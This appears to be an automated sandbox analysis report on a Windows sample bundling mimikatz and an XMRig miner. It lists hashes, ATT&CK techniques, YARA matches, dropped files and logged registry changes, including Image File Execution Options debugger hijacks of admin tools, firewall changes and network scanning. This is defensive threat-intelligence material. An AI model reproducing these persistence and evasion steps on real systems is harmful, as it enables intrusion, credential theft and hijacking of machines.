mimikatz | 46fd2d11f6dba25f28e86a1d6aa4b5191ec7c26e98c39ff617e89189b4d13d08

Analysis

max time kernel
153s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
20/05/2024, 22:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe
Size

7.9MB
MD5

a16f02b32270cb86e6d55c74b5a98617
SHA1

976c15245582160d7aaaa96f0ad2c054a4147418
SHA256

46fd2d11f6dba25f28e86a1d6aa4b5191ec7c26e98c39ff617e89189b4d13d08
SHA512

f64a234bd000789bc1cd51fb23b75a26354ea99cbd238d9e86cea71e4aa20525a3578d8bff15158cc4ea23c92c2e0d7b3702594f492fe613a5e8c487f131e720
SSDEEP

196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Score

10^/10

mimikatz xmrig discovery evasion execution miner persistence upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4896 created 2076	4896	guwlsyl.exe	37

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (16492) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs

resource	yara_rule
behavioral2/memory/3040-138-0x00007FF79CA10000-0x00007FF79CAFE000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

UPX dump on OEP (original entry point) 40 IoCs

resource	yara_rule
behavioral2/memory/5064-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/memory/5064-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x0009000000023278-6.dat	UPX
behavioral2/memory/3448-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x00070000000232ca-134.dat	UPX
behavioral2/memory/3040-135-0x00007FF79CA10000-0x00007FF79CAFE000-memory.dmp	UPX
behavioral2/memory/3040-138-0x00007FF79CA10000-0x00007FF79CAFE000-memory.dmp	UPX
behavioral2/files/0x00070000000232d4-141.dat	UPX
behavioral2/memory/4620-142-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/4620-146-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/files/0x00070000000232d3-149.dat	UPX
behavioral2/memory/1844-150-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	UPX
behavioral2/memory/1900-171-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/1844-175-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	UPX
behavioral2/memory/4796-178-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/3872-182-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/2148-186-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/1844-189-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	UPX
behavioral2/memory/1844-190-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	UPX
behavioral2/memory/1620-192-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/4364-196-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/3320-200-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/3592-204-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/1844-206-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	UPX
behavioral2/memory/3532-213-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/1844-216-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	UPX
behavioral2/memory/3136-218-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/1844-220-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	UPX
behavioral2/memory/3344-223-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/1404-227-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/1844-241-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	UPX
behavioral2/memory/6128-243-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/5132-245-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/1844-246-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	UPX
behavioral2/memory/6500-249-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/6688-251-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/6728-254-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/1844-255-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	UPX
behavioral2/memory/6372-257-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	UPX
behavioral2/memory/1844-305-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	UPX

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/memory/1844-175-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	xmrig
behavioral2/memory/1844-189-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	xmrig
behavioral2/memory/1844-190-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	xmrig
behavioral2/memory/1844-206-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	xmrig
behavioral2/memory/1844-216-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	xmrig
behavioral2/memory/1844-220-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	xmrig
behavioral2/memory/1844-241-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	xmrig
behavioral2/memory/1844-246-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	xmrig
behavioral2/memory/1844-255-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	xmrig
behavioral2/memory/1844-305-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/5064-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/5064-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x0009000000023278-6.dat	mimikatz
behavioral2/memory/3448-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3040-138-0x00007FF79CA10000-0x00007FF79CAFE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	guwlsyl.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	guwlsyl.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4560	netsh.exe
3872	netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	guwlsyl.exe

Executes dropped EXE 30 IoCs

pid	Process
3448	guwlsyl.exe
4896	guwlsyl.exe
2880	wpcap.exe
416	betzilvlu.exe
3040	vfshost.exe
4620	ntaiaautl.exe
1844	ibyaef.exe
1900	ntaiaautl.exe
4228	xohudmc.exe
208	ogmqgi.exe
4796	ntaiaautl.exe
3872	ntaiaautl.exe
2148	ntaiaautl.exe
1620	ntaiaautl.exe
4364	ntaiaautl.exe
3320	ntaiaautl.exe
3592	ntaiaautl.exe
60	guwlsyl.exe
3532	ntaiaautl.exe
3136	ntaiaautl.exe
3344	ntaiaautl.exe
1404	ntaiaautl.exe
4988	itfnybsmt.exe
6128	ntaiaautl.exe
5132	ntaiaautl.exe
6500	ntaiaautl.exe
6688	ntaiaautl.exe
6728	ntaiaautl.exe
6372	ntaiaautl.exe
6212	guwlsyl.exe

Loads dropped DLL 12 IoCs

pid	Process
2880	wpcap.exe
2880	wpcap.exe
2880	wpcap.exe
2880	wpcap.exe
2880	wpcap.exe
2880	wpcap.exe
2880	wpcap.exe
2880	wpcap.exe
2880	wpcap.exe
416	betzilvlu.exe
416	betzilvlu.exe
416	betzilvlu.exe

UPX packed file 36 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000232ca-134.dat	upx
behavioral2/memory/3040-135-0x00007FF79CA10000-0x00007FF79CAFE000-memory.dmp	upx
behavioral2/memory/3040-138-0x00007FF79CA10000-0x00007FF79CAFE000-memory.dmp	upx
behavioral2/files/0x00070000000232d4-141.dat	upx
behavioral2/memory/4620-142-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/4620-146-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/files/0x00070000000232d3-149.dat	upx
behavioral2/memory/1844-150-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	upx
behavioral2/memory/1900-171-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/1844-175-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	upx
behavioral2/memory/4796-178-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/3872-182-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/2148-186-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/1844-189-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	upx
behavioral2/memory/1844-190-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	upx
behavioral2/memory/1620-192-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/4364-196-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/3320-200-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/3592-204-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/1844-206-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	upx
behavioral2/memory/3532-213-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/1844-216-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	upx
behavioral2/memory/3136-218-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/1844-220-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	upx
behavioral2/memory/3344-223-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/1404-227-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/1844-241-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	upx
behavioral2/memory/6128-243-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/5132-245-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/1844-246-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	upx
behavioral2/memory/6500-249-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/6688-251-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/6728-254-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/1844-255-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	upx
behavioral2/memory/6372-257-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp	upx
behavioral2/memory/1844-305-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
86	ifconfig.me
87	ifconfig.me

Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\ogmqgi.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	guwlsyl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	guwlsyl.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\ogmqgi.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	guwlsyl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	guwlsyl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	guwlsyl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	guwlsyl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4	guwlsyl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4	guwlsyl.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	guwlsyl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	guwlsyl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	guwlsyl.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\lbtermtbs\UnattendGC\specials\docmicfg.exe	guwlsyl.exe
File opened for modification	C:\Windows\lbtermtbs\etamgyklt\Result.txt	itfnybsmt.exe
File created	C:\Windows\lbtermtbs\etamgyklt\wpcap.exe	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\posh-0.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\trch-1.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\schoedcl.xml	guwlsyl.exe
File created	C:\Windows\jetgmbly\schoedcl.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\etamgyklt\wpcap.dll	guwlsyl.exe
File created	C:\Windows\jetgmbly\svschost.xml	guwlsyl.exe
File created	C:\Windows\jetgmbly\spoolsrv.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\tibe-2.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\Corporate\mimidrv.sys	guwlsyl.exe
File created	C:\Windows\jetgmbly\guwlsyl.exe	2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe
File created	C:\Windows\lbtermtbs\etamgyklt\itfnybsmt.exe	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\cnli-1.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\exma-1.dll	guwlsyl.exe
File opened for modification	C:\Windows\jetgmbly\docmicfg.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\etamgyklt\ip.txt	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\vimpcsvc.exe	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\schoedcl.exe	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\zlib1.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\upbdrjv\swrpwe.exe	guwlsyl.exe
File created	C:\Windows\lbtermtbs\etamgyklt\scan.bat	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\tucl-1.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\svschost.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\Shellcode.ini	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\libeay32.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\trfo-2.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\svschost.xml	guwlsyl.exe
File opened for modification	C:\Windows\jetgmbly\spoolsrv.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\docmicfg.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\spoolsrv.xml	guwlsyl.exe
File opened for modification	C:\Windows\lbtermtbs\Corporate\log.txt	cmd.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\docmicfg.xml	guwlsyl.exe
File created	C:\Windows\jetgmbly\vimpcsvc.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\Corporate\vfshost.exe	guwlsyl.exe
File created	C:\Windows\ime\guwlsyl.exe	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\svschost.exe	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\libxml2.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\xdvl-0.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\spoolsrv.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\vimpcsvc.xml	guwlsyl.exe
File opened for modification	C:\Windows\jetgmbly\guwlsyl.exe	2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe
File created	C:\Windows\lbtermtbs\etamgyklt\Packet.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\coli-0.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\crli-0.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\ssleay32.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\spoolsrv.exe	guwlsyl.exe
File created	C:\Windows\jetgmbly\docmicfg.xml	guwlsyl.exe
File opened for modification	C:\Windows\jetgmbly\schoedcl.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe	guwlsyl.exe
File opened for modification	C:\Windows\jetgmbly\svschost.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\AppCapture32.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\Corporate\mimilib.dll	guwlsyl.exe
File opened for modification	C:\Windows\lbtermtbs\etamgyklt\Packet.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\ucl.dll	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\vimpcsvc.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\specials\schoedcl.xml	guwlsyl.exe
File opened for modification	C:\Windows\jetgmbly\vimpcsvc.xml	guwlsyl.exe
File created	C:\Windows\lbtermtbs\UnattendGC\AppCapture64.dll	guwlsyl.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3080	sc.exe
3736	sc.exe
5060	sc.exe
3968	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0009000000023278-6.dat	nsis_installer_2
behavioral2/files/0x001100000001e2e1-15.dat	nsis_installer_1
behavioral2/files/0x001100000001e2e1-15.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
412	schtasks.exe
2004	schtasks.exe
3904	schtasks.exe

Modifies data under HKEY_USERS 47 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	guwlsyl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	guwlsyl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
